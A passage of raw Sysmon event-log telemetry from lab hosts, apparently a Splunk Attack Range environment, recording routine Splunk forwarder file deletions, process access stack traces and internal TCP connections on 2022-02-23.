Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.480{C8EA50B7-1040-6216-E704-000000003802}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:20.198{C8EA50B7-103F-6216-E604-000000003802}48285220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:21.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880AFA84CE72F339DA0C9BF54D5C12C8,SHA256=D0D922280EBD796A160CF4120FAED6C12B25BD2E1713CD196BD33F7B617EA300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:21.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D052714FC6229E197B77A259B31FDDD8,SHA256=D4ABB6E88D9734227E6A5B6FF34CEADF6B5EEB408E07DF2465204ABA87CE2116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:22.807{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C97F819F6FEAD94EC044AF6B3CC05949,SHA256=3BA030F8E20F0E454D54B8E8D445C913077B6EC27BB858F02D2A6EDC2914D73C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:20.497{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51275-false10.0.1.12-8000- 23542300x8000000000000000215697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:22.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2091DD974DC48769E3C5C25D7DF2824,SHA256=7170AAF94E77330952E36B52E016211B168A9C1FB2AF5A1CD90E25A09E79A11F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:23.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE9A5AAB2DBD301359B3942688C945FA,SHA256=BA85D9EA4192869EF8548891D6F67B8B58A5AD38842F26146276F0E398D94827,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:23.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0675C439855E9032DAFCBE805203EA2A,SHA256=A17F5B13725F7F368FD941718E0720513A218D8976102D62F613098E2A7D488A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:21.577{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53360-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:24.979{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4654EB0FD89014AEEFC5947F68C65D5,SHA256=C2B87CC337ACB47F3049D02A4A28A25C8512FC106780B3C25CDD1C59B80308AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:24.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A609241225AFB43386B8F21801143A40,SHA256=BADE38E784ED68B01B540BC97AC2040BEB459316A9621CFBBE6C5FE9B3DCE517,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:25.994{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D85F690F134FEEAF9073ADB0065CBF4,SHA256=EE3EC9243F669114B57B5870CA616CD9700D6388A4280A571511EEA34947613E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:25.402{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=425C5CC7E7EDB54B6DDBE56EF6E41FE1,SHA256=E4C6997A295A3BFA1BDA9C0C1C7C0DBC32500A1384B690D3C4D4A320FD1C7C01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:26.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94D16B50CB34B1420CF22E4338054D71,SHA256=9702BAF94895EF36912FDEE08ED652C7BC9AE221C0B6F21B638598E58087FF0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:25.684{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51276-false10.0.1.12-8000- 23542300x8000000000000000215703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:27.448{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE4DCB45C27F2410DB2912C3207F8AB,SHA256=0F62DB45CE0B34502455B3B947F1C7624D333659519AA4D94E7077436306980D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:27.026{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E9AE041A16B70AD2D67C46E042DBC92,SHA256=6B22BD61E36F274DD8E476F01C56BB604463D9734E0E5521B16FE3DC1D966F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:28.448{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFF12F5B2378515B9281A45432452B36,SHA256=B1A737414C223BACAF961ED9EB90E2DE19D4D74AC135A0528163ADBEF7F8F6FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:28.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BEFA3A27C7A8C900E638F989E6DF8CE,SHA256=34C908CA68C346F5C5EB557C9D8E8B5833F89ADC586247EB9A750630E0F3FB64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:29.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78432F9684E76356C5C6D660B51902B7,SHA256=233E4C7D71F01BBC83BC6BAC61C43C55EE180D37A8A4963AAD6C2F83F09F4241,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:26.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:29.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57FC9BBB7E47107C10B17F171DE652FA,SHA256=327EF5038D60442683F309D1DE65E7B960A0FDEFD9D4418DBC3495BFD453955D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:30.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DF55191463A48997118756F0ABF4A4,SHA256=50CDC50D61782A4BC143EFA73523E19B37121797A8558657800060F6D1CC10C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:30.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B426DA8426734996178343A933C258C,SHA256=4324A3BFDE6199B61A809459608432DD4F36C329D30B81ABF1100AA2561250F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:30.260{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C3B4CC278C87BFE7019EE7D9A3DE5E73,SHA256=A56985FD1BA92C63ADF95D1C0A59541597594275BD994544C60F1724A64F67AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:31.791{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=086882A76E9E53F17FD5950321741EA6,SHA256=217636E38A9879DA9B0797C5D8DDE839686BF3DC28DD4676E5548C3C680A6252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:31.151{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=408FACD08FEC7E9A22B6080702165B2C,SHA256=DF7648D50DCB6BC88BCD38215E510B4546608BA0E66F5BF0EF48491821FA9266,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:32.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A86D646EBA938FCB38CCA40993B9C0D,SHA256=8B74EF0B91891024F82791617607827B2BE4E87AFDD6858C241A19405003CC9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:32.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527258872128AAF73FB890C45ED3386B,SHA256=FB421077462FB6EB8B2C6272D9A18F8FA3D631EEC239414B40604F8C7A29D6A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:33.323{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=39CC3181FE955B1C8EEFC345FE65ADEE,SHA256=568EA5917E36617A6F6C78F5290B29D6CE2674B5385C422EAC3819B0ADBA400A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:33.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3DEAF3C8192842111769088DAAA0A52,SHA256=9F40A4164346BBBFBD580177D28AF801BDA43C60DF1F7106412979983ACE7236,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:31.450{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51277-false10.0.1.12-8000- 23542300x8000000000000000215711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:34.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48C621AE9577693779DD794EAD9AAF77,SHA256=7B19A9D1F150900062EBB1F9B180A01101B099BAEDB16AEF5687CAF5AAD472AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:32.655{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53362-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:34.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CF908AD15B01860F125142C4CEB3F3B,SHA256=97B6676D3DFC989683FE78BEE3B3E31CDF0FFF25B4B29F53CFC22DA2094A9F9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:35.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9D91BBDDD21F2C86F004CEFE386C00,SHA256=08FEA53A6DE4137DD515E7E6C41E7DEFA0B24C7D2FABF419A47DE4F678F5CC8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:35.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B8925F146C4658802765D6F9D9710BD,SHA256=031FE9CE8325784394783E9D81BC8595AAC1FA6075BF52933EF0AF64FAD9924D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:36.369{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F5B10B5821ED61D0227DF18CB12FAA,SHA256=0339CF5E89D79D2E3702CC93A703902601DE4D037ACFF39EB611658790CB4F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:36.495{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C79CDCFC8151E6C9DBD25CD22B63DFE,SHA256=20DA0FABA0856729ABDF0730BC03A21693FF7CB2C2813FCBA2C0D7DF3B56D01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:37.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9332A5BDAF59550A2CB87F2BF2E93CA7,SHA256=BAF39DA7E4968924174E510C8851F0430ECCA7EC22356E9551206B9952D94093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:37.510{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0AB4645C9267594DC78B3E486C570B,SHA256=EFBDAE5E2AA8B72E41944A812EE9180C41B3FA3400F5CFB4DFCA68DA6CCF8CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:38.479{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=167EE1EC7BCDD9950B26C47D9F6E60E9,SHA256=BC9CA960C76D9A4ED6C2E2795BBFEC2F145E25F1D2A41BCBD1B6977A3BEB5861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:38.526{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=462463ADFF64044C6374D907D8B6E74E,SHA256=ECE62369E935856C2A142D60177E45A1CFF3CC1525F5F3B7C00EBC61A3ADA138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:39.682{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:39.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF485AE496169431107D2185F7CB986,SHA256=FB34978D76688C9DCBC37F5AA41E6D75CB35B171482FAA08ACCFC9A897E86F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:39.526{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88628DC32A6F8EA1F9431A9B12E43C94,SHA256=DF70D89765396469A24A5D5959F63FF490AC5DEE3415C154C2487BACCD562327,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:36.669{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51278-false10.0.1.12-8000- 23542300x8000000000000000286850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:40.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 